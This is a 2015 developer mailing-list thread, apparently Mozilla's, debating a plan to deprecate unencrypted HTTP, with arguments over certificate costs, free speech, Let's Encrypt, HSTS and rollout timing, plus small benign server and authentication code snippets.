3. Computers: To mark (a component of a software standard) as obsolete to warn against its use in the future so that it may be phased out.

Thesaurus: An educated dinosaur

Phil

--
Philip Chee <philip@aleytys.pc.my>, <philip.chee@gmail.com>
http://flashblock.mozdev.org/ http://xsidebar.mozdev.org
Guard us from the she-wolf and the wolf, and guard us from the thief,
oh Night, and so be good for us to pass.
On Wed, Apr 15, 2015 at 6:13 PM, Karl Dubost <kdubost@mozilla.com> wrote:
> Socially, eavesdropping is part of our daily life. We go to a café, we are
> having a discussion and people around you may listen what you are saying.
> You read a book in the train, a newspaper and people might see what you are
> reading.

The HTTP equivalent to those is a "passive MITM" -- listening in (but unlike a few strangers around you in the cafe who might hear a few words, it's a global surveillance regime storing every word for years). That's problem enough, but using HTTP also allows an "active MITM", where the attacker intercepts your words and changes them so that your companion hears something different -- perhaps instead of ordering 2 boxes of Girl Scout cookies you're heard to say 20, and that they should be delivered to the house across the street. Or instead of proposing to your SO you're heard to break up with them because you can't stand their mother (oh hey, is that your ex over in the corner with the computer?).

-Dan Veditz
On Monday, April 13, 2015 at 4:57:58 PM UTC+2, Richard Barnes wrote:
> In order to encourage web developers to move from HTTP to HTTPS, I would
> like to propose establishing a deprecation plan for HTTP without security.

I think server-side SSL certificates should be deprecated as a means to encrypt a connection. Ideally this is what should happen:

1. User downloads a browser (be it Firefox, Chrome, Opera, etc.) securely (https?) from the official download location.
2. Upon installation, a private key is created for that browser installation and signed by the browser's certificate server.
3. When the user later connects to a server that supports automatic encryption, the browser sends a (public) session key that the server should use; this key is signed with the browser installation key, and the server can verify the signature, and that this key is not modified, by checking the certificate server.
4. The server exchanges its session key with the browser.
5. A secure/encrypted connection is now possible.

I know, not that well explained and oversimplified. But the concept is hopefully clear, but in case it's not... This is today's server certificate system, but in reverse.

This concept does not replace https as it is today, but does allow "free" encrypted connections. Web designers, hosting companies, etc. only need to ensure their server software is up to date and able to support this. The benefit is that there are no server-side certificates needed to establish an encrypted connection. The browser/client installation certificate can easily be changed each time a browser is updated, and can be set to expire within a certain number of months.

Not sure what to call this concept. "Reverse-HTTPS" maybe? RHTTPS for short?

Traditional server-side certificates are still needed, especially the "green bar" ones. And free basic ones like StartSSL gives out are still of use, to allow old browsers to use HTTPS, and to support a fallback in case a browser certificate has expired (and still allow a secure connection).

The issue today (even with free certificates like StartSSL gives out) is that webmasters and hosting companies have to do a yearly dance to update the certificates. And not all hosting companies support HTTPS for all their packages. Sites that make some profit can probably afford to pay for the extra HTTPS feature and pay for a certificate. Myself, I'm lucky in that my host provides free HTTPS support for the particular package I have (though not for the smallest package).

My concept has a flaw though. Browser makers need to set up their own certificate server to sign the generated browser installation keys. And server software (Apache, nginx, etc.) needs to support a type of RHTTPS so it can send a session key to the browser. The benefit though is that servers do not need a certificate installed to create an encrypted connection.

Further security could be built on top of this where the server or client or both have authenticated certificates (so that there is not only an encrypted connection but also an identified server and client).

A concept like RHTTPS would allow a slow migration with no direct need for webmasters nor browser users to change anything themselves, with zero cost to webmasters/hosters and the end users.
Very briefly:

On 21/04/15 12:43, skuldwyrm@gmail.com wrote:
> 1. User downloads a browser (be it Firefox, Chrome, Opera, etc.)
> securely (https?) from the official download location. 2. Upon
> installation a private key is created for that browser installation
> and signed by the browser's certificate server.

This makes checking in with the browser maker a necessary prerequisite for secure connections. That has problems.

> 3. When the user
> later connect to a server that support automatic encryption, the
> browser sends a (public) session key that the server should use, this
> key is signed with the browser installation key, the server can
> verify the signature and that this key is not modified by checking
> the certificate server.

What you just built is a unique identifier for every browser which can be tracked across sites.

> 4. The server exchanges it's session key with
> the browser. 5. A secure/encrypted connection is now possible.

Except that the browser has not yet identified the site. It is important for the user to check the site is genuine before the user sends any important information to it.

> The benefit is that there is no server side certificates needed to
> establish a encrypted connection.

They are needed if the user wants to have any confidence in who they are actually talking to.

Gerv
On 2015-04-21 6:43 AM, skuldwyrm@gmail.com wrote:
> I know, not that well explained and over simplified. But the concept
> is hopefully clear, but in case it's not...

For what it's worth, a lot of really smart people have been thinking about this problem for a while and there aren't a lot of easy buckets left on this court. Even if we had the option of starting with a clean slate, it's not clear how much better we could do, and scrubbing the internet's security posture down to the metal and starting over isn't really an option. We have to work to improve the internet as we find it, imperfections and tradeoffs and all.

Just to add to this discussion, one point made to me in private was that HTTPS-everywhere defangs the network-level malware-prevention tools a lot of corporate/enterprise networks use. My reply was that those same companies have tools available to preinstall certificates in browsers they deploy internally - most (all?) networking-hardware companies will sell you tools to MITM your own employees - which would be an acceptable solution in those environments where that's considered an acceptable solution, and not a thing to block on.

- mhoye
On Tue, Apr 21, 2015 at 9:56 AM, Mike Hoye <mhoye@mozilla.com> wrote:
> Just to add to this discussion, one point made to me in private was that
> HTTPS-everywhere defangs the network-level malware-prevention tools a lot
> of corporate/enterprise networks use. My reply was that those same
> companies have tools available to preinstall certificates in browsers they
> deploy internally - most (all?) networking-hardware companies will sell you
> tools to MITM your own employees - which would be an acceptable solution in
> those environments where that's considered an acceptable solution, and not
> a thing to block on.

Yeah, I agree this is an issue, but not a blocker. It's already a problem for the ~65% of web transactions that are already encrypted, and people are already thinking about how to manage these enterprise roots better / improve user visibility.

--Richard
Just out of curiosity, is there an equivalent of:

    python -m SimpleHTTPServer

in the TLS world currently, or is any progress being made towards that?
On Monday, April 13, 2015 at 4:57:58 PM UTC+2, Richard Barnes wrote:
> In order to encourage web developers to move from HTTP to HTTPS, I would
> like to propose establishing a deprecation plan for HTTP without security.

I think this is a very, very bad idea. There are many resources which are not worth being protected by HTTPS. Moreover, it doesn't make sense e.g. for resources in the local network. And there are devices which CANNOT use HTTPS, e.g. a webserver on an 8-bit MCU (like http://tuxgraphics.org/electronics/200611/article06111.shtml).

So, please, let it be the responsibility of the webmaster and/or the user whether to use HTTP or HTTPS!

P.
On Thursday, April 23, 2015 at 11:47:14 PM UTC-4, voracity wrote:
> Just out of curiosity, is there an equivalent of:
>
>     python -m SimpleHTTPServer
>
> in the TLS world currently, or is any progress being made towards that?

openssl req -new -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem
openssl s_server -accept 8000 -key key.pem -cert cert.pem -HTTP

Not quite as simple, but not far off. With the above, you can get <https://localhost:8000/>, as long as you're willing to click through a certificate warning.
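[For readers who would rather stay in Python, roughly the same one-liner spirit can be recovered with the standard library. This is a minimal sketch, assuming a modern Python 3 and the cert.pem/key.pem pair generated by the openssl commands above; the certificate is still self-signed, so the browser warning still applies.]

```python
# Serve the current directory over TLS -- a rough analogue of
# "python -m SimpleHTTPServer", wrapped in SSL.
import http.server
import ssl

server = http.server.HTTPServer(
    ("localhost", 8000), http.server.SimpleHTTPRequestHandler)

ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# If key.pem was generated with a passphrase, add password="..." here.
ctx.load_cert_chain(certfile="cert.pem", keyfile="key.pem")
server.socket = ctx.wrap_socket(server.socket, server_side=True)

server.serve_forever()  # now reachable at https://localhost:8000/
```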
On Friday, April 24, 2015 at 1:03:00 AM UTC-4, butrus...@gmail.com wrote:
> I think this is a very, very bad idea. There are many resources which are not worth being protected by HTTPS. Moreover, it doesn't make sense e.g. for resources in the local network. And there are devices which CANNOT use HTTPS, e.g. a webserver on an 8-bit MCU.
>
> So, please, let it be the responsibility of the webmaster and/or the user whether to use HTTP or HTTPS!

To be clear, we are not proposing to remove that choice, only limiting the set of web features that non-HTTPS pages can use.

There are also plenty of small platforms that can support HTTPS. Slightly bigger than what you're talking about, but still small.

http://hypernephelist.com/2014/08/19/https_on_arduino_yun.html

--Richard
On 2015-04-24 1:02 AM, butrus.butrus@gmail.com wrote:
> I think this is a very, very bad idea. There are many resources which are
> not worth being protected by HTTPS.

This is about protecting people, not resources.

I think an eight-year-old article about a hacked-up, homebrew 8-bit webserver is the edgiest of edge cases I've ever seen, but there's a seed of an idea in there about embedded devices that's important. The common case there, though, will be home users who do not know the first thing about network security but have a house full of wireless embedded devices and appliances, not the lo-fi hacker community who you'd expect to have a better sense of what they're in for.

In that context HTTPS is a security measure you expect to be there by default, as basic and universal as the locks on your front door.

- mhoye
On Tuesday, April 21, 2015 at 2:56:21 PM UTC+2, Gervase Markham wrote:
> This makes checking in with the browser maker a necessary prerequisite
> for secure connections. That has problems.

How so? Certificates have to be checked today as well (whether they have been revoked or not). Also, it would only be at installation time for the user; the server itself would check whether it has been revoked or not.

StartSSL uses client certificates for logins; so do several other sites. If you can have a client-server connection where only the server has a certificate, then the opposite is also possible, where the client-server connection is secured with only the client having a certificate.

> What you just built is a unique identifier for every browser which can
> be tracked across sites.

How can this be tracked? This can be tracked just like any other client certificate can be tracked currently; no difference.

> Except that the browser has not yet identified the site. It is important
> for the user to check the site is genuine before the user sends any
> important information to it.
>
> They are needed if the user wants to have any confidence in who they are
> actually talking to.

DNSSEC exists and should help mitigate the who-you-are-talking-to issue. Also, certificates have been falsified (didn't Mozilla just untrust all certificates by a certain certificate issuer recently that allowed fake Google.com certificates to be made?).

Also, with certificates like the free ones from StartSSL, the only site identity you can see is "identity not verified", yet the connection is still HTTPS. Just look at https://skuldwyrm.no/ which uses a free StartSSL certificate. Do note however that this .no domain does have DNSSEC enabled (do all the latest browsers support that?). So one can be relatively sure to be talking to skuldwyrm.no without https.

What I'm proposing is no worse than automatic domain-validated certificates currently are. The important thing is that the connection is encrypted here, not whether the site is trusted or not. Heck, there are sites with a "green url bar" that do rip people off, so trust, or ensuring you don't get fooled, is not automagic with any type of HTTPS in that regard.
On Tuesday, April 21, 2015 at 3:56:31 PM UTC+2, Mike Hoye wrote:
> For what it's worth, a lot of really smart people have been thinking
> about this problem for a while and there aren't a lot of easy buckets
> left on this court. Even if we had the option of starting with a clean
> slate it's not clear how much better we could do, and scrubbing the
> internet's security posture down to the metal and starting over isn't
> really an option. We have to work to improve the internet as we find it,
> imperfections and tradeoffs and all.

How about HTTP/2?

Also, a lot of smart minds completely ignored HTTP Digest Authentication for years, allowing Basic (plain text) passwords to be sent when logging in on sites. I hate plain text logins; how many blogs and forums out there have plain text logins right now? The number is scary, I'm sure.

MITM attacks are one thing; what is worse is network eavesdropping. Log in to your blog or forum from a cafe and you are screwed, basically. It has been shown that despite using WPA2 to the router, others on the same router can catch packets and decrypt them. And then they have your login/password.

Now when I make logins for web projects I use a JavaScript client-side HMAC and a challenge-response, so I do not even send the HMAC/hash over the network. The server gives the javascript/client a challenge and a nonce; the password, which the user knows and the server knows (actually the server only knows a hmac of the pass and salt), is used with the challenge, and then the result is sent back as an answer. An eavesdropper will not be able to get the password.

Now, there are other attacks that could be used, like session exploits, but this is true even for HTTPS connections. And a javascript/client solution like this is open to a MITM attack since it's not encrypted or signed in any way (code signing certificates are even more expensive than site certificates).

I'd like to see a client-based HMAC challenge-response built in, and a way for a browser and a server-side script to establish an encrypted connection without the need for certificates. This would solve the plaintext login headache, and would be attractive to sites that only have HTTP (no HTTPS option) but have, for example, PHP support or some other scripting language.

HTTP/2 could be extended to improve the way HTTP Digest Authentication works, adding a HMAC(PSWD+SALT) + Challenge(NONCE) = Response(HASH) method.
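[To make the scheme described above concrete, here is a minimal sketch of that challenge-response exchange, in Python rather than the client-side JavaScript the post describes, purely for illustration; the names are hypothetical, and, as the post itself concedes, this hides the password from eavesdroppers but does nothing against an active MITM.]

```python
import hashlib
import hmac
import os

def password_verifier(password: bytes, salt: bytes) -> bytes:
    # The HMAC(PSWD+SALT) the post mentions: what the server stores at
    # signup instead of the raw password.
    return hmac.new(salt, password, hashlib.sha256).digest()

# --- signup (server side) ---
salt = os.urandom(16)
stored = password_verifier(b"correct horse", salt)

# --- login: server issues a one-time challenge (nonce) ---
challenge = os.urandom(16)

# --- client side: rebuild the verifier from the typed password and the
# salt the server sent, then answer the challenge; neither the password
# nor the verifier itself ever crosses the wire ---
client_side = password_verifier(b"correct horse", salt)
answer = hmac.new(client_side, challenge, hashlib.sha256).hexdigest()

# --- server side: recompute and compare in constant time ---
expected = hmac.new(stored, challenge, hashlib.sha256).hexdigest()
print(hmac.compare_digest(answer, expected))  # True for the right password
```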
This is a digression, but it touches on an important question that others are asking in response to this general push [1].

Fundamentally, better client authentication doesn't do anything to help make the web a more secure place (in any of the dimensions that we're primarily concerned about in this thread, anyway). It can actually make things worse by creating more ways of tracking users.

On Fri, Apr 24, 2015 at 3:28 PM, Roger Hågensen <skuldwyrm@gmail.com> wrote:
> How about HTTP/2?
> Also, a lot of smart minds completely ignored HTTP Digest Authentication for years, allowing Basic (plain text) passwords to be sent when logging in on sites.

The problems with both digest and basic are primarily poor UX. This is well-known. From a security perspective, both are pretty poor, but since the UX was so poor they weren't used that much. Consequently, they were neglected.

HTTP APIs have been used more in recent years, so we're seeing more demand for better mechanisms that are native to the protocol. OAuth is one such thing. And new authentication methods are being developed in the httpauth working group in the IETF [2]. Participation is open there; feel free to sign up. You can also look into essentially proprietary systems like hawk [3], which Mozilla services have decided they quite like.

> HTTP/2 could be extended to improve the way HTTP Digest Authentication works, adding a HMAC(PSWD+SALT) + Challenge(NONCE) = Response(HASH) method.

HTTP/2 is not the place for authentication improvements. We specifically removed the mechanism Google invented for SPDY early in the HTTP/2 process for that reason (and others). The mechanisms cited above all work perfectly well with HTTP/1.1, and that's still considered an important property.

[1] http://www.w3.org/DesignIssues/Security-ClientCerts.html
[2] https://tools.ietf.org/wg/httpauth
[3] https://github.com/hueniverse/hawk
On 24/04/15 23:06, Roger Hågensen wrote:
> How so? Certificates have to be checked today as well (whether they have
> been revoked or not).

Yes, and this has privacy problems too. Hence the move towards OCSP stapling, which does not.

> How can this be tracked? This can be tracked just like any other
> client certificate can be tracked currently; no difference.

Right. And that's one reason why people don't use client certificates! :-)

Client certificates allow users to be tracked with 100% accuracy across every site which requests the cert. Which is why, IIRC, by default, users are prompted in Firefox before sending a client certificate.

> DNSSEC exists and should help mitigate the who-you-are-talking-to issue.

And is not fully deployed, and certainly not where it's most needed, at the endpoints.

> Also, certificates have been falsified (didn't Mozilla just untrust
> all certificates by a certain certificate issuer recently that
> allowed fake Google.com certificates to be made?)

"Sometimes certs are misissued -> certs can never be trusted" is not good logic.

> Also, with certificates like the free ones from StartSSL, the only site
> identity you can see is "identity not verified", yet the connection is
> still HTTPS.

The domain name is the site identity for a DV certificate.

> Do note however that this .no domain does have DNSSEC enabled (do all the
> latest browsers support that?). So one can be relatively sure to be
> talking to skuldwyrm.no without https.

Perhaps, in this one case, if Firefox checked DNSSEC, which it doesn't. But you would have no guarantee of content integrity without HTTPS - an attacker could alter the content during transmission.

> What I'm proposing is no worse than automatic domain-validated
> certificates currently are.

Then why re-engineer the entire secure Internet just to get something which is "no worse"?

Gerv
Here are two relevant Bugzilla bugs:

Self-signed certificates are treated as errors: https://bugzilla.mozilla.org/show_bug.cgi?id=431386
Switch generic icon to negative feedback for non-https sites: https://bugzilla.mozilla.org/show_bug.cgi?id=1041087

Here's a proposed way of phasing this plan in over time:

1. Mid-2015: Start treating self-signed certificates as unencrypted connections (i.e. stop showing a warning, but the UI would just show the globe icon, not the lock icon). This would allow website owners to choose to block passive surveillance without causing any cost to them or any problems for their users.

2. Late-2015: Switch the globe icon for http sites to a gray unlocked lock. The self-signed certs would still get the globe icon. This would incentivize website owners to at least start blocking passive surveillance if they want to keep the same user experience as before. Also, this new icon wouldn't be loud or intrusive to the user.

3. Late-2016: Change the unlocked icon for http sites to a yellow icon. Hopefully, by the end of 2016, Let's Encrypt has taken off and a lot of frameworks like wordpress include tutorials on how to use it. This increased uptake of free authenticated https, plus the ability to still use self-signed certs for unauthenticated https (remember, this still blocks passive adversaries), would allow website owners enough alternative options to start switching to https. The yellow icon would push most over the edge.

4. Late-2017: Switch the unlocked icon for http to red. After a year of yellow, most websites should already have switched to https (authenticated or self-signed), so now it's time to drive the nail in the coffin and kill http on any production site with a red icon.

5. Late-2018: Show a warning for http sites. This experience would be similar to the self-signed cert experience now, where users have to manually choose to continue. Developers building websites would still be able to choose to continue to load their dev sites, but no production website in their right mind would choose to use http only.
Whoopie... I can jump through hoops and make TLS fast. Why should I have to? The user should be the decision maker. If they want to visit an unsecured HTTP site of cat videos... let them. If a hacker wants to edit those cat videos while in transit... LET THEM. Why strong-arm everyone into using HTTPS when it is not necessary? This is an immensely expensive (man-hours) solution to a non-problem.
On Thursday, April 30, 2015 at 5:57:13 PM UTC-7, dia...@gmail.com wrote:
> 1. Mid-2015: Start treating self-signed certificates as unencrypted connections (i.e. stop showing a warning, but the UI would just show the globe icon, not the lock icon). This would allow website owners to choose to block passive surveillance without causing any cost to them or any problems for their users.

In mid-2015 we will be launching Let's Encrypt to issue free certificates using automated protocols, so we shouldn't need to do this.
On Thursday, April 30, 2015 at 6:02:44 PM UTC-7, peter.e...@gmail.com wrote:
> In mid-2015 we will be launching Let's Encrypt to issue free certificates using automated protocols, so we shouldn't need to do this.

The thing that may actually be implemented, which is similar to what you want, is the HTTP opportunistic encryption feature of HTTP/2.0. That's strictly better than unencrypted HTTP (since it is safe against passive attacks) and strictly worse than authenticated HTTPS (because it fails instantly against active attacks). So if clients implement it, it has a natural ordinal position in the UI and feature-access hierarchy.

If the Let's Encrypt launch goes as planned, it would probably be a mistake to encourage sites to use unauthenticated opportunistic HTTP encryption.
I think this is a grave mistake.

The simplicity of the web was the primary factor in its explosive growth. By putting up barriers to entry you are discouraging experimentation, discouraging one-off projects, and discouraging leaving inactive websites running (as keeping certs up to date will be a yearly burden).

I understand that there are proposed solutions to these problems, but they don't exist today and won't be ubiquitous for a while. That *has* to come first. Nothing is more important than the free speech the web allows. Not even security.

That the leading minds of the web no longer value this makes me feel like an old fogey, an incredibly sad one.
On Thu, Apr 30, 2015 at 5:57 PM, <diafygi@gmail.com> wrote:
> Here's a proposed way of phasing this plan in over time:
>
> 1. Mid-2015: Start treating self-signed certificates as unencrypted
> connections (i.e. stop showing a warning, but the UI would just show the
> globe icon, not the lock icon). This would allow website owners to choose
> to block passive surveillance without causing any cost to them or any
> problems for their users.

I think you're over-focusing on the lock icon and not thinking enough about the referential semantics. The point of the https: URI is that it tells the browser that this is supposed to be a secure connection, and the browser needs to enforce this regardless of the UI it shows.

To give a concrete example, say the user enters his password in a form that is intended to be submitted over HTTPS and the site presents a self-signed certificate. If the browser sends the password, then it has possibly compromised the user's password even if it subsequently doesn't show the secure UI (because the attacker could supply a self-signed certificate).

-Ekr
Restrictions might be: unless the website is serving from the local network,

1. you can't use a password input (treat it as equal to a normal text input).
2. you can't set cookies.
3. javascript is disabled.

A header is provided to prevent content from an https page being loaded into an http page (maybe working like same-origin). Insecure content is never loaded into a secure page (unless you open the advanced configuration).

P.S.: And finally, accept CAcert or an easy-to-use CA.
On Thu, Apr 30, 2015 at 10:49 PM, Matthew Phillips <phillipsm2@gmail.com> wrote:
> I understand that there are proposed solutions to these problems but they don't exist today and won't be ubiquitous for a while. That *has* to come first. Nothing is more important than the free speech the web allows. Not even security.

This is a false choice... you cannot have free speech without safe spaces. Many, many have written about this, e.g., https://cdt.org/files/2015/02/CDT-comments-on-the-use-of-encryption-and-anonymity-in-digital-communcations.pdf

--
Joseph Lorenzo Hall
Chief Technologist
Center for Democracy & Technology
1634 I ST NW STE 1100
Washington DC 20006-4011
(p) 202-407-8825
(f) 202-637-0968
joe@cdt.org
PGP: https://josephhall.org/gpg-key
fingerprint: 3CA2 8D7B 9F6D DBD3 4B10 1607 5F86 6987 40A9 A871
Of course you know this is not true. There have been many petabytes of free speech floating around on the internet for the last two decades, despite not having mandatory https.

All mandatory https will do is discourage people from participating in speech unless they can afford the very high costs (both in dollars and in time) that you are now suggesting be required. Or worse, handing over their speech to a big company (like the ones many people in this discussion work for) instead of hosting it themselves. This is the antithesis of what the web has always been, and should be.

On Fri, May 1, 2015, at 07:53 AM, Joseph Lorenzo Hall wrote:
> This is a false choice... you cannot have free speech without safe
> spaces.
On 2015-05-01 8:03 AM, Matthew Phillips wrote:
> Of course you know this is not true. There have been many petabytes of
> free speech floating around on the internet for the last two decades,
> despite not having mandatory https.

There are some philosophical discussions to be had here around "freedom from" and "freedom to", maybe. As one example, for a long time there weren't rules about what side of the road you drive on. It just wasn't necessary. Over time that changed, obviously, and the rules of the road we have now make driving much safer, and that safety facilitates more real freedom for everyone than having no rules would. The risks and realities of the modern web are very different than they were 20 years ago, and it's reasonable - and should be expected, IMO - that the web's rules of the road should have to grow and adapt as well.

For what it's worth, I think you're making a leap to "mandatory" here that is not supported by the proposal, but you do have a good point about the cost of participating in speech that's worth digging into, so here's a question:

If you run an ASP.NET site straight out of VS, you get HTTP-only, and lots of developers do this. Same thing AFAIK with pretty much all the serve-what-I-have-up-now tools on Linux, python, node, whatever. Do we have a clear sense of the impact this has on developers, and how to address that?

- mhoye
On Monday, April 13, 2015 at 4:57:58 PM UTC+2, Richard Barnes wrote:
> There's pretty broad agreement that HTTPS is the way forward for the web.

There is no such agreement, and even if there was, that doesn't mean you get to force people to agree.

> In order to encourage web developers to move from HTTP to HTTPS, I would
> like to propose establishing a deprecation plan for HTTP without security.

You're using the wrong word here; what you're proposing is a coercion scheme.

> Having an overall program for HTTP deprecation makes a clear
> statement to the web community that the time for plaintext is over.

No, it just tells the world that you're a paid shill for the SSL cert racket.

This idea of yours is bad. It's bad for the reasons very articulately outlined in this blog entry: http://cryto.net/~joepie91/blog/2015/05/01/on-mozillas-forced-ssl/

The TL;DR of it is this:

- TLS is broken because of the CA structure, which allows any CA to sign a certificate for any website.
- SSL certificates are a racket; I think this shouldn't require explanation, really.
- "Free" SSL certificate providers don't exist (startcom is also a racket).
- "Let's Encrypt" doesn't solve the variety of usecases (and its setup scheme is also batshit insane).

I would personally like to add a few more to the list:

- The freedom of speech should not require you to buy into an expensive racket.
- SSL still has a non-zero speed impact, which is a problem in some scenarios.
- Edge-routing/CDN etc. is a very useful technique that's currently practically free to do, and allows scrummy startups to build awesome services. TLS virtually kills all of that.
- Not everything is even encryptable, really not. For instance, UDP packets carrying game-player positions aren't, because they arrive out of order.
- There's an enormous amount of legacy content on the web you will *never* get to move to TLS; you want to throw that all away too?
- Implementing and using small, dedicated, quirky HTTP servers for the variety of usecases there are is a very productive activity. Mandating/coercing TLS makes all those existing deployments impossible, and it also makes it impossible in the first place to have them at all.

In summary, you're batshit insane, power hungry, and mad, and you're using doublespeak at its finest.
On 5/1/15 02:54, 王小康 wrote:
> P.S.: And finally, accept CAcert or an easy-to-use CA.

CAs can only be included at their own request. As it stands, CAcert has withdrawn its request to be included in Firefox until they have completed an audit with satisfactory results. If you want CAcert to be included, contact them and ask what you can do to help.

In the meanwhile, as has been brought up many times in this thread already, there are already deployed or soon-to-be-deployed "easy to use CAs" in the world.

--
Adam Roach
Principal Platform Engineer
abr@mozilla.com
+1 650 903 0800 x863
On 5/1/15 05:03, Matthew Phillips wrote:
> All mandatory https will do is discourage people from participating in
> speech unless they can afford the very high costs (both in dollars and
> in time) that you are now suggesting be required.

Let's be clear about the costs and effort involved.

There are already several deployed CAs that issue certs for free. And within a couple of months, it will take users two simple commands, zero fiscal cost, and several tens of seconds to obtain and activate a cert:

https://letsencrypt.org/howitworks/

There is great opportunity for you to update your knowledge about how the world of CAs has changed in the past decade. Seize it.

--
Adam Roach
Principal Platform Engineer
abr@mozilla.com
+1 650 903 0800 x863
On Friday, May 1, 2015 at 7:03:32 PM UTC+2, Adam Roach wrote:
> There are already several deployed CAs that issue certs for free. And
> within a couple of months, it will take users two simple commands, zero
> fiscal cost, and several tens of seconds to obtain and activate a cert:
>
> https://letsencrypt.org/howitworks/
>
> There is great opportunity for you to update your knowledge about how
> the world of CAs has changed in the past decade. Seize it.

That's not how it works. That's how you and letsencrypt imagine it'll work. In reality, it's anybody's guess if that's even feasible (I don't think so, but I digress).

Let's even assume that every shared host, CDN, etc. can use this (which they can't, because custom deployments, whatever). Do you think the long-established SSL cert racket syndicate is going to take this lying down? OK, so let's assume all the other pricey CAs are OK with this, magically, and aren't gonna torpedo truly free CAs with any lobbying dollar they can muster. What happens in the glorious future where the letsencrypt CA has attracted, say, 90% of all certs (because, duh, free), and then they get PWNed? Oops.
You must have missed my original email: > I understand that there are proposed solutions to these problems but > they don't exist today and won't be ubiquitous for a while. Let's let these solutions prove themselves out first. There are no free wildcard cert vendors and, at least in my experience, what you do get is a heavy upsell and/or slow delivery of certificates. If this is your standard for good enough, I'm really fearful for the future of the web. It's paramount that the web remain a frictionless place where creating a website is dead simple. This is infinitely more important than making people feel safe knowing that http doesn't exist any more. My fear is that the pendulum has swung away from this (previously self-evident) position and that the people running the web today have other priorities. On Fri, May 1, 2015, at 01:03 PM, Adam Roach wrote: > On 5/1/15 05:03, Matthew Phillips wrote: > > All mandatory https will do is discourage people from > > participating in speech unless they can afford the very high costs (both in dollars and in time) that you are now suggesting be required. > > Let's be clear about the costs and effort involved. > > There are already several deployed CAs that issue certs for free. And within a couple of months, it will take users two simple commands, zero fiscal cost, and several tens of seconds to obtain and activate a cert: > > https://letsencrypt.org/howitworks/ > > There is a great opportunity for you to update your knowledge about how the world of CAs has changed in the past decade. Seize it. > > -- > Adam Roach Principal Platform Engineer abr@mozilla.com +1 650 903 > 0800 x863
Why encrypt (and slow down) EVERYTHING, when most web content isn't worth encrypting? I just don't see the point. This is the dumbest thing I've heard in a long while.
On Fri, May 1, 2015 at 2:07 PM, <scoughlin@cpeip.fsu.edu> wrote: > Why encrypt (and slow down) EVERYTHING I think this is largely outdated thinking. You can do TLS fast and with low overhead, even on the biggest and most latency-sensitive sites in the world. https://istlsfastyet.com > when most web content isn't worth encrypting? Fundamentally, HTTPS protects the transport of the content - not the secrecy of the content itself. It is, after all, likely stored in cleartext on each computer. This is an important distinction no matter the nature of the content, because Firefox, as the user's agent, has a strong interest in the user seeing the content she asked for and in protecting her confidentiality (as best as is possible) while doing the asking. Those are properties transport security gives you. Sadly, both of those fundamental properties of transport are routinely broken, to the user's detriment, when http:// is used. As Martin and Richard have noted, we have a strong approach with HSTS for the migration of legacy markup onto https as long as the server is appropriately provisioned - and doing that is much more feasible now than it used to be. So sites that are deploying new features can make the transition with a minimum of fuss. For truly untouched and embedded legacy services, I agree this is a harder problem, and compatibility needs to be considered a managed risk. -P
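For readers who haven't deployed HSTS: the migration Patrick describes comes down to two server-side steps - redirect plaintext requests to https://, and send a Strict-Transport-Security header so the browser keeps itself on https afterwards. Below is a minimal sketch in Node-style TypeScript; the hostname, key paths, and max-age are illustrative assumptions, not recommendations for any particular site.

```typescript
// Minimal HSTS migration sketch (hostname and file names are hypothetical).
import * as http from "http";
import * as https from "https";
import { readFileSync } from "fs";

// Step 1: the legacy plaintext listener does nothing but redirect.
http.createServer((req, res) => {
  res.writeHead(301, { Location: `https://example.com${req.url}` });
  res.end();
}).listen(80);

// Step 2: the secure listener tells browsers to stay on https.
https.createServer(
  { key: readFileSync("key.pem"), cert: readFileSync("cert.pem") },
  (req, res) => {
    // One year, in seconds. After the first visit over TLS, the browser
    // upgrades future http:// references to this host on its own.
    res.setHeader("Strict-Transport-Security", "max-age=31536000");
    res.end("hello over TLS\n");
  }
).listen(443);
```

That self-upgrading behavior is what makes legacy markup migratable without editing every embedded http:// link.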
Honestly, this is a terrible idea. The whole point of a browser is providing user access - this would take power away from users by deciding for them what is permissible. It also fails to account for the bulk of web traffic, which does not require encryption (and is the reason HTTP exists in the first place). Traditionally, developers have been the ones to decide what traffic merits encryption and what does not. An argument could be made that the decision should not rest solely with them, but also with users (who are stakeholders); however, browsers certainly should not be involved in deciding whether a site is accessed. If there are security concerns, then inform the user, but do not make a blanket decision that would make unencrypted cat pictures inaccessible.
On Fri, May 1, 2015 at 2:37 PM, Patrick McManus <pmcmanus@mozilla.com> wrote: > It is, after all, likely stored in cleartext on each computer. This is an > important distinction no matter the nature of the content, because Firefox, > as the user's agent, has a strong interest in the user seeing the content > she asked for and in protecting her confidentiality (as best as is possible) > while doing the asking. Those are properties transport security gives you. > Sadly, both of those fundamental properties of transport are routinely > broken, to the user's detriment, when http:// is used. Yes, I'll add something Patrick knows very well, but just to hammer it home: HTTPS as transport protection isn't just about confidentiality but also about integrity of the transport. So even if those of you out there are saying "The web doesn't have much private stuff! Jeez!", the web sure has a lot of stuff that is highly dynamic, with JavaScript and other active content. That stuff needs to be protected in transit lest the Great Cannon or any number of user-hostile crap on the net start owning your UAs, even if you don't think the content needs to be private. best, Joe -- Joseph Lorenzo Hall Chief Technologist Center for Democracy & Technology 1634 I ST NW STE 1100 Washington DC 20006-4011 (p) 202-407-8825 (f) 202-637-0968 joe@cdt.org PGP: https://josephhall.org/gpg-key fingerprint: 3CA2 8D7B 9F6D DBD3 4B10 1607 5F86 6987 40A9 A871
When plans like this aren't rolled out across all browsers together, users inevitably come across a broken site and say "Firefox works with this site, but Safari gives a warning. Safari must be broken". Better security is punished. Having this determined by a browser release is also bad. "My up-to-date Firefox is broken, but my old Safari works. Updating breaks things and must be bad!" Secure practices are punished. All browsers could change their behaviour on a specific date and time. But that would lead to stampedes of webmasters having issues all at once. And if there's any unforeseen compatibility issue, you just broke the entire world. Not so great. So might I suggest that the best rollout plan is to apply policies based on a hash of the origin and a timestamp. I.e., on a specific date, 1% of sites have the new policies enforced, while 99% do not. Then a month later, it's up to 51%, and another month later it's up to 100%. Webmasters can now see the date and time policies will be enforced for their site, and there is no risk of breaking the entire internet on the same day. Developer builds could apply the policies a few weeks early to give a heads-up.
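To make the staged rollout concrete, here is one way a browser could derive a stable per-origin enforcement bucket. The hash choice, bucket count, and ramp dates below are illustrative assumptions, not anything a vendor has specified.

```typescript
// Sketch of the staged-rollout idea: each origin maps to a stable bucket
// in [0, 100), and the policy applies once the global ramp percentage
// passes that bucket. Hash and schedule are illustrative only.
import { createHash } from "crypto";

function originBucket(origin: string): number {
  const digest = createHash("sha256").update(origin).digest();
  // First 4 bytes as an unsigned integer, reduced mod 100.
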